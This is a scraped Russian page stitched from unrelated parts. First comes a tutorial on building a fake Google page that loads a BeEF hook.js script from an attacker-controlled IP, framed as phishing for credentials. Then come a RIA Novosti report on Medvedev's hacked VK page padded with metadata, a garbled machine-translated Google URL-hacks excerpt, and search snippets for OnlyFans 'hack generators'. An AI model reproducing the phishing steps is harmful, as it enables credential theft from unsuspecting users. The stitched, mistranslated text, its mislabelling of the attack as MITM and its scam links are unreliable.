Взлом через ссылку в браузере и как от этого защититься
QUASAR Взломинг 18,765
Содержание
- 1 Взлом через ссылку и фейк-страницу
- 1.1 Установка BeEF на Kali Linux
- 1.2 Создание фейк-страницы
- 1.3 Взлом через ссылку
- 2 Защита от взлома через ссылку и фейк-страницу
- 3 Заключение
Часто на форумах появляется вопросы типа «Можно взломать аккаунт через ссылку?». В статье отвечу на этот вопрос и покажу, как это делают хакеры с помощью Kali Linux и BeEF. Мы не будем рассматривать подробно все детали, для этого не хватит одной статьи, но если вас интересует этичный хакинг, вы можете все это найти на нашем сайте.
Еще по теме: Лучшие устройства хакера
Статья написана в образовательных целях, для обучения пентестеров (этичных хакеров). Использование подобных методов без надлежащего разрешения, является незаконным и расценивается, как уголовное преступление. Ни редакция spy-soft. net, ни автор не несут ответственность за ваши действия.
Данный материал будет также полезен и обычным пользователям. Изучения и понимание методов взлома и проникновения, поможет вам в соблюдении кибергигиены.
Взлом через ссылку и фейк-страницу
Итак, нам понадобится дистрибутив Kali Linux и фреймворк эксплуатации браузеров BeEF (Browser Exploit Framework). Это инструмент для тестирования на проникновение, который фокусируется на браузерах.
Инструмент позволяют создать фейк-страницу, содержащую JavaScript и менять контент в зависимости от конкретного клиента. Мы рассказывали про BeEF в статье «Использование фишинговой рассылки в пентесте».
Установка BeEF на Kali Linux
Запускаем Kali Linux (см. также Установка Kali Linux на Windows)
Для установки BeEF на Kali Linux используем команду:
sudo apt install beef-xss |
Когда установка завершится, находим в приложениях фреймворк и запускаем пункт «beef start».
Откроется терминал и будет предложено ввести новый пароль для веб-интерфейса BeEF. Также необходимо скопировать хук и сохранить в каком-нибудь текстовом файле. Позже надо будет его вставить в фейк-страницу.
Через несколько секунд ваш браузер автоматически откроет веб-интерфейс BeEF. Войдите используя созданную ранее учетную запись.
Создание фейк-страницы
Для этого примера будем использовать страницу Google. Клонируем страницу Google репозитория GitHub.
git clone https://github.com/anirudhbelwadi/Google-Landing-Page.git |
Отредактируем файл index.html и вставим ссылку на файл hook.js с сервера BeEF между тегами head.
<script src=»http://<IP>:3000/hook.js»></script> |
Проверим работу сервера с помощью python http.server:
python3 -m http. server 80 |
Открываем браузер и видим фейк-страницу (поддельный сайт).
Как видим на скрине фейк-страница работает корректно.
Взлом через ссылку
Для получения внешнего IP злоумышленник будет использовать облачные сервисы и зарегистрирует какой-нибудь похожий на google.ru домен. Может подойти и бесплатный домен.
Дальше все просто. Хакер посылает ссылку на фейк-страницу пользователю, тот нечего не подозревая вводит логин и пароль и злоумышленник получает аутентификационные данные.
Найти предлог открыть ссылку и склонить вести свои данные — довольно просто. Для этого есть социальная инженерия.
Защита от взлома через ссылку и фейк-страницу
Вот несколько рекомендаций для защиты от подобной атаки:
- Никогда не доверяйте полученным ссылкам. Особенное подозрение должны вызвать скрытые или укороченный ссылки. Перед переходом по такой ссылке, стоит расшифровать короткую ссылку и определить куда она ведет.
- Всегда проверяйте домен (название сайта), когда хотите ввести учетные данные авторизации.
- По возможности используйте расширение для блокировки JavaScript.
- Никогда не заходите в свои аккаунты используя публичный сети WiFi. Для проверки почты или авторизации в соцсетях лучше использовать мобильную связь или надежный VPN.
Заключение
Рассмотренный способ называется MITM (человек посередине). Техника заключается в том, чтобы создать поддельный сайт и поддельный домен, а затем отправить пользователю фишинговое письмо с ссылкой на фейк-страницу.
Теперь вы знаете, что взломать через ссылку вполне возможно, в особенности, если пользователь не интересуется информационной безопасностью и летает в облаках.
Полезные ссылки:
- Как с помощью Fluxion взламывают WiFi
- Хакерский смартфон с помощью Termux и Kali Linux
ВКонтакте
OK
Telegram
Viber
Медведев назвал взлом страницы «ВКонтакте» проявлением информационной войны
https://ria. ru/20220804/medvedev-1807161570.html
Медведев назвал взлом страницы «ВКонтакте» проявлением информационной войны
Медведев назвал взлом страницы «ВКонтакте» проявлением информационной войны — РИА Новости, 04.08.2022
Медведев назвал взлом страницы «ВКонтакте» проявлением информационной войны
Зампредседателя Совбеза Дмитрий Медведев в интервью РИА Новости прокомментировал взлом своей страницы в соцсети «ВКонтакте», заявив, что от подобного никто не… РИА Новости, 04.08.2022
2022-08-04T11:05
2022-08-04T11:05
2022-08-04T12:55
политика
дмитрий медведев
россия
вконтакте
/html/head/meta[@name=’og:title’]/@content
/html/head/meta[@name=’og:description’]/@content
https://cdnn21.img.ria.ru/images/07e6/05/19/1790636465_0:0:3121:1756_1920x0_80_0_0_816878938ed9ccf0325c8d8cfa7abcfb.jpg
МОСКВА, 4 авг — РИА Новости. Зампредседателя Совбеза Дмитрий Медведев в интервью РИА Новости прокомментировал взлом своей страницы в соцсети «ВКонтакте», заявив, что от подобного никто не застрахован, но виновные не останутся безнаказанными. На странице Медведева вечером 1 августа появился пост, посвященный геополитике, в частности, развитию государственности Грузии и Казахстана, позже запись удалили. Он заявил, что это проявление информационной войны, а вражеских стран, которые заинтересованы в столкновении партнеров по ОДКБ, ЕАЭС и ШОС, предостаточно.»Такие взломы случаются не впервые. От них никто не застрахован. В свое время и когда я занимал пост председателя правительства, мне доводилось сталкиваться с подобными атаками. Это проявление той самой информационной войны, о которой мы только что говорили», — сказал он.Медведев добавил, что компетентные службы проводят проверку.»Виновные безнаказанными не останутся», — добавил политик.Зампред Совбеза отметил, что поссорить Россию с друзьями из СНГ не удастся, диалог выстроен прямой, откровенный и без двусмысленностей.»Очевидны и нехитрые методы такой «работы» — вбросить от имени известного лица в публичное поле что-то резкое или чувствительное о соседях, сыграть на исторических сюжетах, дождаться неизбежного удаления фейка, а потом торговать этим. Типа в России сделали все специально, послали жесткий сигнал союзникам, а потом дипломатично отгребли. Вроде бы и следов нет, а осадочек остался. Вот они — «истинные намерения русских». Вот их «агрессивные замыслы», — заявил Медведев.По его словам, «мы так никогда не работали и не работаем», а «с друзьями разговариваем прямо и откровенно, без двусмысленностей».
https://ria.ru/20220804/medvedev-1807163331.html
https://ria.ru/20220804/medvedev-1807163965.html
россия
РИА Новости
1
5
4.7
96
7 495 645-6601
ФГУП МИА «Россия сегодня»
https://xn--c1acbl2abdlkab1og.xn--p1ai/awards/
2022
Варвара Скокшина
Варвара Скокшина
Новости
ru-RU
https://ria.ru/docs/about/copyright.html
https://xn--c1acbl2abdlkab1og.xn--p1ai/
РИА Новости
1
5
4.7
96
7 495 645-6601
ФГУП МИА «Россия сегодня»
https://xn--c1acbl2abdlkab1og. xn--p1ai/awards/
1920
1080
true
1920
1440
true
https://cdnn21.img.ria.ru/images/07e6/05/19/1790636465_117:0:2846:2047_1920x0_80_0_0_e93df88744fb3443c12ce8b05edd04e6.jpg
1920
1920
true
РИА Новости
1
5
4.7
96
7 495 645-6601
ФГУП МИА «Россия сегодня»
https://xn--c1acbl2abdlkab1og.xn--p1ai/awards/
Варвара Скокшина
политика, дмитрий медведев, россия, вконтакте
Политика, Дмитрий Медведев, Россия, ВКонтакте
МОСКВА, 4 авг — РИА Новости. Зампредседателя Совбеза Дмитрий Медведев в интервью РИА Новости прокомментировал взлом своей страницы в соцсети «ВКонтакте», заявив, что от подобного никто не застрахован, но виновные не останутся безнаказанными.
На странице Медведева вечером 1 августа появился пост, посвященный геополитике, в частности, развитию государственности Грузии и Казахстана, позже запись удалили. Он заявил, что это проявление информационной войны, а вражеских стран, которые заинтересованы в столкновении партнеров по ОДКБ, ЕАЭС и ШОС, предостаточно.
«Такие взломы случаются не впервые. От них никто не застрахован. В свое время и когда я занимал пост председателя правительства, мне доводилось сталкиваться с подобными атаками. Это проявление той самой информационной войны, о которой мы только что говорили», — сказал он.
Медведев добавил, что компетентные службы проводят проверку.
«Виновные безнаказанными не останутся», — добавил политик.
Медведев заявил, что некоторые страны хотят столкнуть союзников по ОДКБ
4 августа 2022, 11:12
Зампред Совбеза отметил, что поссорить Россию с друзьями из СНГ не удастся, диалог выстроен прямой, откровенный и без двусмысленностей.
«Очевидны и нехитрые методы такой «работы» — вбросить от имени известного лица в публичное поле что-то резкое или чувствительное о соседях, сыграть на исторических сюжетах, дождаться неизбежного удаления фейка, а потом торговать этим. Типа в России сделали все специально, послали жесткий сигнал союзникам, а потом дипломатично отгребли. Вроде бы и следов нет, а осадочек остался. Вот они — «истинные намерения русских». Вот их «агрессивные замыслы», — заявил Медведев.
По его словам, «мы так никогда не работали и не работаем», а «с друзьями разговариваем прямо и откровенно, без двусмысленностей».
США сеют рознь везде, кроме своего континента, заявил Медведев
4 августа 2022, 11:13
Взлом URL-адресов Google — Google Hacks [Книга]
Взлом URL-адреса, который Google выдает вам в ответ на поиск.
Когда вы думаете о хаках, вы можете подумать сделать крутую поисковую форму или выполнить особенно сложную поиск. Но вы также можете взломать результаты поиска, взломав URL-адрес, который Google возвращается после поиска. Есть по крайней мере один то, что вы можете сделать, взломав URL-адрес, что вы не можете сделать иначе, и есть быстрые приемы, которые могут спасти вас от поездки обратно в страницу дополнительных настроек в противном случае.
Допустим, вы хотите найти три
слепой
мышей
. URL вашего результата
зависит от установленных вами параметров,
но URL-адрес результатов будет выглядеть примерно так:
http://www.google.com/search?num=100&hl=en&q=%22three+blind+mice%22
Запрос
сам &q=%22three+слепые+мыши%22
, %22
является URL-кодированием "
(двойная кавычка) — это довольно очевидно, но давайте
сломать, что означают эти дополнительные биты.
число=100
относится
к количеству результатов поиска к
стр., в данном случае 100. Google принимает любое число от 1 до 100.
Изменение значения num
— это хороший ярлык для
изменение предпочтительного размера вашего набора результатов без необходимости
перейдите на страницу расширенного поиска и повторите поиск.
Не видите num=
в своем запросе?
Просто добавьте его к URL-адресу вашего запроса, используя любое значение от 1 до 100.
Совет
Вы можете добавить или изменить любой из модификаторов, описанных здесь, просто
добавление их к URL-адресу или изменение их значений — часть
после =
(равно) — чему-то в пределах
допустимый диапазон для рассматриваемого модификатора.
hl=en
означает
язык интерфейса — язык
в котором вы используете Google, что отражается на главной странице, в сообщениях и
кнопок — на английском языке (по крайней мере, у меня).
На странице языковых инструментов Google [Совет № 2] представлен список языковых вариантов. Запустите свой
наведите указатель мыши на каждый и обратите внимание на изменение, отраженное в URL-адресе; тот самый
для свиной латыни выглядит так:
http://www.google.com/intl/xx-piglatin/
Код языка — это бит между intl/
и
последний /
, xx-piglatin
в этом
случай. Примените это к имеющемуся URL-адресу поиска:
hl=xx-piglatin
Что, если вы поместите несколько модификаторов &hl
на
URL результата? Google использует то, что идет последним. В то время как это делает для
запутанные URL-адреса, это означает, что вы всегда можете прибегнуть к лени и добавить
дополнительный модификатор в конце, а не редактирование
что уже есть.
Есть еще пара модификаторов, которые, добавленные к вашему URL, могут предоставьте некоторые полезные модификации ваших результатов:
-
as_qdr=mx
Указывает максимальный возраст поиска результаты, в мес.
x
— любое число от 1 до 12; Я считаю, что числа от 1 до 6 являются лучшими.-
сейф=выкл.
Средства фильтр безопасного поиска отключен. Фильтр безопасного поиска удаляет результаты поиска в основном сексуального характера. явный характер.
safe=on
означает SafeSearch фильтр включен.
Взлом URL-адреса Google может показаться не самым интуитивно понятный способ быстро получить результаты, но это слишком быстрее, чем перезагрузка формы расширенного поиска и в одном случае (в модификатор «месяцев») это единственный способ получить определенный набор Результаты.
Получите
члена O’Reilly знакомятся с книгами, живыми мероприятиями, курсами, подобранными в зависимости от должности, и многим другим от O’Reilly и почти 200 ведущих издателей.
Начать бесплатную пробную версию
onlyfans-link-hack — Google Такой
ВсеВидеоСнимкиНовостиКартыПокупкиКупить
Такой вариант
Совет: Begrenze diesuche auf deutschsprachige Ergebnisse. Du kannst deinesuchsprache in den Einstellungen ändern.
(ПОСЛЕДНЕЕ ОБНОВЛЕНИЕ)* БЕСПЛАТНАЯ ПРЕМИУМ-АККАУНТ ТОЛЬКО ДЛЯ ФАНАТ…
school-education.ec.europa.eu › школы-организации
ССЫЛКА↑]. 2023. 02. 16., Чт – 06:04. Государственное учреждение. ○ Не проверено. (ПОСЛЕДНЕЕ ОБНОВЛЕНИЕ)* БЕСПЛАТНЫЙ ГЕНЕРАТОР ПРЕМИУМ-АККАУНТОВ ТОЛЬКО ДЛЯ ВЕНТИЛЯТОРОВ [ HACK-FREE.LINK↑] …
workfastly-onlyfans-premium-accountgenerator-2023-working-991
school-education. ec.europa.eu › школы-организации
Кто мы? Free Onlyfans Premium Account Generator 2023 ~Onlyfans Hack Generator.Onlyfans Premium Account Hack. Сегодня ПОЛУЧИТЕ бесплатный аккаунт в onlyfans в Mod …
onlyfans hack 2022 | Подробности — start.gg
www.start.gg › пользователь
onlyfans hack 2022. Домашняя страница. О. onlyfans хак 2022 86a4a0ef. Австрия. Январь 2022 г. Start.gg заботится о вашей конфиденциальности. Start.gg и наши сторонние поставщики используют …
Der ultimative OnlyFans Hack — So erhältst Du mehr Reichweite
ebakery.de › News
20.04.2022 · Heute wollen wir uns anschauen worauf es bei OnlyFans ankommt, welche Hacks euch mehr Reichweite bringen und welchen ultimativen Hack Ihr auf …
onlyfans-hack-link-2021 Публикации издателя — Issuu
issuu.com › onlyfans-hack-link-2021
Onlyfans hack link 2021 [Премиум-генератор]. Дж.П. Взлом OnlyFans — это служба культурных СМИ, расположенная в Лондоне, Англия. К нему можно было получить доступ онлайн и …
So erhältst Du mehr Reichweite und Abonnenten | OnlyFans Tutorial
www.youtube.com › смотреть
06.07.2022 · Окончательный вариант OnlyFans Hack sorgt dafür, dass du mehr Reichweite bekommst, somit mehr Abonnenten erhältst und im Endeffekt mit OnlyFans 90 Ways 90305 90 Аккаунты OnlyFans в 2023 году
blog.ainfluencer.com › The Influencer Insight
28.02.2023 · Откройте секретные методы взлома Onlyfans бесплатно! Узнайте, как приобрести эксклюзивный контент, не потратив ни копейки.
Wie hackt man ein Onlyfan-Konto? — Alucare
www.alucare.fr › Alucare › Kategorie NEWS, alle Nachrichtenartikel
18.06.2022 · Онлайн-программное обеспечение и инструменты, в том числе Onlyfans-Konto zu Hacken, aber Hacking ist eine legale Praxis, ins Besondere in den Gen des …
Simple hack раскрывает тайну любовника Аккаунты OnlyFans
nypost.com › 2022/03/18 › simple-hack-exposes-lo.